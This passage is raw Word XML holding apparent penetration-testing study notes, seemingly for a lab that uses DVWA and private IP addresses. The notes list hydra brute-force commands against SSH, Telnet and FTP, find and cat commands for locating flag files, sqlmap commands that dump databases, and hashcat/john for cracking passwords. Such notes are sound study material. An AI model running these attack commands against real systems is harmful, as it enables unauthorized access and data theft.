      <w:r w:rsidRPr="40100644" w:rsidR="24DB394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/</w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="24DB394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u:username</w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="24DB394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/</w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="24DB394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p:password</w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="24DB394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/</w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="24DB394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v:IPAddress</w:t>
      </w:r>
      <w:r w:rsidRPr="40100644" w:rsidR="24DB394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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7253BDFD" w:rsidP="5B4D83BD" w:rsidRDefault="7253BDFD" w14:paraId="65A47B28" w14:textId="78483FDE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="7253BDFD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; decrypt </w:t>
      </w:r>
      <w:r w:rsidR="7253BDFD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>hashcat</w:t>
      </w:r>
      <w:r w:rsidR="7253BDFD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>/john the ripper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7253BDFD" w:rsidP="5B4D83BD" w:rsidRDefault="7253BDFD" w14:paraId="6FABFEC5" w14:textId="3777F808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7253BDFD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt;crc32 (</w:t>
      </w:r>
      <w:hyperlink r:id="R4b068961ba8d448f">
        <w:r w:rsidRPr="7D333612" w:rsidR="7253BDFD">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
          </w:rPr>
          <w:t>https://emn178.github.io/online-tools/crc/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="7253BDFD">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> )or crc32 &lt;filename&gt;</w:t>
      </w:r>
      <w:r w:rsidR="139D9784">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>---&gt;use windows</w:t>
      </w:r>
      <w:r w:rsidR="6A914AA7">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ,for </w:t>
      </w:r>
      <w:r w:rsidR="6A914AA7">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:r w:rsidR="6A914AA7">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> use </w:t>
      </w:r>
      <w:r w:rsidR="6A914AA7">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:r w:rsidR="6A914AA7">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="04A35859" w:rsidP="5B4D83BD" w:rsidRDefault="04A35859" w14:paraId="723A6545" w14:textId="2E6064CD">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="04A35859">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Remote Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="01417934">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>/windows</w:t>
      </w:r>
      <w:r w:rsidRPr="5B4D83BD" w:rsidR="04A35859">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="04A35859" w:rsidP="5B4D83BD" w:rsidRDefault="04A35859" w14:paraId="5D832B4A" w14:textId="74C5439A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="04A35859">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt; scan for ssh or telnet</w:t>
      </w:r>
      <w:r w:rsidR="1DE6E5E3">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or ftp</w:t>
      </w:r>
      <w:r w:rsidR="04A35859">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ports</w:t>
      </w:r>
      <w:r w:rsidR="3A65862E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as remote login can be either of them</w:t>
      </w:r>
      <w:r w:rsidR="67C18E57">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="04A35859" w:rsidP="5B4D83BD" w:rsidRDefault="04A35859" w14:paraId="28752677" w14:textId="3A13F509">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5C5AA300" w:rsidR="04A35859">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>SSH:</w:t>
      </w:r>
      <w:r w:rsidRPr="5C5AA300" w:rsidR="5A40FFAF">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> p 22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5B4D83BD" w:rsidP="5C5AA300" w:rsidRDefault="5B4D83BD" w14:paraId="4910183E" w14:textId="243002AB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="7A9A9D5A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r w:rsidR="7138226A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>hydra -L username.txt -P pass.txt -t 4 192.168.215.133 ssh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7A9A9D5A" w:rsidP="5C5AA300" w:rsidRDefault="7A9A9D5A" w14:paraId="25EDD8D9" w14:textId="647D5830">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="7A9A9D5A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt; hydra -</w:t>
      </w:r>
      <w:r w:rsidR="7A9A9D5A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>vV</w:t>
      </w:r>
      <w:r w:rsidR="7A9A9D5A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -t 1 -w 10 -L username.txt -P pass.txt ssh://192.168.215.133 (if normal command </w:t>
      </w:r>
      <w:r w:rsidR="7A9A9D5A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>doesnot</w:t>
      </w:r>
      <w:r w:rsidR="7A9A9D5A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> work then </w:t>
      </w:r>
      <w:r w:rsidR="2EA1FBDE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>these flags</w:t>
      </w:r>
      <w:r w:rsidR="7A9A9D5A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="0766184A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>- will take time</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0766184A" w:rsidP="5C5AA300" w:rsidRDefault="0766184A" w14:paraId="10A94BFB" w14:textId="033D500F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="0766184A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt; hydra -</w:t>
      </w:r>
      <w:r w:rsidR="0766184A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>vV</w:t>
      </w:r>
      <w:r w:rsidR="0766184A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -L username.txt -P pass.txt -t 1 -w 5 192.168.215.133 ssh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0766184A" w:rsidP="5C5AA300" w:rsidRDefault="0766184A" w14:paraId="460647C2" w14:textId="487B43E5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="0766184A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt; find / -type f -name target.txt 2&gt; /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7043F679" w:rsidP="5C5AA300" w:rsidRDefault="7043F679" w14:paraId="341DB2BF" w14:textId="7636850C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7043F679">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="5C5AA300" w:rsidR="7043F679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find / -name "secret.txt" 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0766184A" w:rsidP="5C5AA300" w:rsidRDefault="0766184A" w14:paraId="6E0838D6" w14:textId="4AB24561">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="0766184A">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt; cat &lt;target.txt&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="50583F9D" w:rsidP="5C5AA300" w:rsidRDefault="50583F9D" w14:paraId="6129540A" w14:textId="599871C2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5C5AA300" w:rsidR="50583F9D">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Telnet: p 23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2753AB21" w:rsidP="5C5AA300" w:rsidRDefault="2753AB21" w14:paraId="73A11FAC" w14:textId="30C1CC54">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5C5AA300" w:rsidR="2753AB21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-&gt; hydra -l admin -P passlist.txt -o test.txt </w:t>
      </w:r>
      <w:r w:rsidRPr="5C5AA300" w:rsidR="2753AB21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>x.x.x.x</w:t>
      </w:r>
      <w:r w:rsidRPr="5C5AA300" w:rsidR="2753AB21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telnet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2753AB21" w:rsidP="5C5AA300" w:rsidRDefault="2753AB21" w14:paraId="0045EBD5" w14:textId="32B54A8B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5C5AA300" w:rsidR="2753AB21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-&gt; telnet </w:t>
      </w:r>
      <w:r w:rsidRPr="5C5AA300" w:rsidR="2753AB21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>hostname_or_ip</w:t>
      </w:r>
      <w:r w:rsidRPr="5C5AA300" w:rsidR="2753AB21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5C5AA300" w:rsidR="2753AB21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>port_number</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2753AB21" w:rsidP="5C5AA300" w:rsidRDefault="2753AB21" w14:paraId="47E4B1A5" w14:textId="487B43E5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="2753AB21">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt; find / -type f -name target.txt 2&gt; /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2753AB21" w:rsidP="5C5AA300" w:rsidRDefault="2753AB21" w14:paraId="6E1B8487" w14:textId="5878606A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2753AB21">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="5C5AA300" w:rsidR="2753AB21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>find / -name "secret.txt" 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2753AB21" w:rsidP="5C5AA300" w:rsidRDefault="2753AB21" w14:paraId="2944C087" w14:textId="6D0E3A4C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="2753AB21">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt; cat &lt;target.txt&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="704863DA" w:rsidP="0F5D67A2" w:rsidRDefault="704863DA" w14:paraId="49AB2E6F" w14:textId="1C6A737B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="2CBD582F" w:rsidR="704863DA">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Ftp:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="630BA450" w:rsidP="2CBD582F" w:rsidRDefault="630BA450" w14:paraId="227B4E64" w14:textId="7A66BE9E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="70C9293C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; hydra -t 1 -v -L username.txt -P pass.txt </w:t>
      </w:r>
      <w:r w:rsidR="70C9293C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>ftp://192.168.215.130</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="630BA450" w:rsidP="2CBD582F" w:rsidRDefault="630BA450" w14:paraId="648DADF6" w14:textId="487B43E5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="36055C9B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt; find / -type f -name target.txt 2&gt; /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="630BA450" w:rsidP="5C5AA300" w:rsidRDefault="630BA450" w14:paraId="453A33A1" w14:textId="5878606A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36BB81A2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="5C5AA300" w:rsidR="36BB81A2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>find / -name "secret.txt" 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="630BA450" w:rsidP="2CBD582F" w:rsidRDefault="630BA450" w14:paraId="2FA308F6" w14:textId="4AB24561">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="36055C9B">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt; cat &lt;target.txt&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="630BA450" w:rsidP="2CBD582F" w:rsidRDefault="630BA450" w14:paraId="0A0F2394" w14:textId="13F60211">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2CBD582F" w:rsidP="2CBD582F" w:rsidRDefault="2CBD582F" w14:paraId="3DCFA65A" w14:textId="2AB5C0E3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="4D91423B" w:rsidP="2CBD582F" w:rsidRDefault="4D91423B" w14:paraId="623D53F5" w14:textId="5E5870DE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7D333612" w:rsidR="4D91423B">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>SQL:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="086BDCD4">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Sqli</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6C85E7A1" w:rsidP="7D333612" w:rsidRDefault="6C85E7A1" w14:paraId="694198E5" w14:textId="2A4063E5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="6C85E7A1">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt; sqlmap -u "http://192.168.44.40" --crawl=3 --level=5 --risk=3 --dbs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="086BDCD4" w:rsidP="2CBD582F" w:rsidRDefault="086BDCD4" w14:paraId="41A3B595" w14:textId="3091335D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="086BDCD4">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OS-command injection to retrieve a specific file – </w:t>
      </w:r>
      <w:r w:rsidR="086BDCD4">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7D333612" w:rsidP="7D333612" w:rsidRDefault="7D333612" w14:paraId="0483F2A2" w14:textId="41C96977">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="7F8F021F" w:rsidP="7D333612" w:rsidRDefault="7F8F021F" w14:paraId="76E90529" w14:textId="749F6F8E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="7F8F021F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>--------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7F8F021F" w:rsidP="7D333612" w:rsidRDefault="7F8F021F" w14:paraId="2999D182" w14:textId="63705267">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="7F8F021F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021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D333612" w:rsidR="7F8F021F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021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-u "</w:t>
      </w:r>
      <w:hyperlink r:id="R957c501382874c08">
        <w:r w:rsidRPr="7D333612" w:rsidR="51F02A7C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http://test1.ceg.com/search.php?q=test</w:t>
        </w:r>
        <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021F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"</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021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--cookie="PHPSESSID=your_ </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>session_id</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>" --dump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7F8F021F" w:rsidP="7D333612" w:rsidRDefault="7F8F021F" w14:paraId="0DF42517" w14:textId="4091E8F6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="7F8F021F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021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D333612" w:rsidR="7F8F021F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021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-u "</w:t>
      </w:r>
      <w:hyperlink r:id="R5c4082855cc54c3c">
        <w:r w:rsidRPr="7D333612" w:rsidR="51F02A7C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http://test1.ceg.com/search.php?q=test</w:t>
        </w:r>
        <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021F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"</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021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--cookie="PHPSESSID=your_ </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>session_id</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>" --dbs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7F8F021F" w:rsidP="7D333612" w:rsidRDefault="7F8F021F" w14:paraId="18BD0598" w14:textId="1A5FC274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D333612" w:rsidR="7F8F021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-&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021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-u "</w:t>
      </w:r>
      <w:hyperlink r:id="Rd75eb94d70dc4c7e">
        <w:r w:rsidRPr="7D333612" w:rsidR="51F02A7C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http://test1.ceg.com/search.php?q=test</w:t>
        </w:r>
        <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021F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"</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021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--cookie="PHPSESSID=your_ </w:t>
      </w:r>
      <w:r w:rsidRPr="7D333612" w:rsidR="7F8F021F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
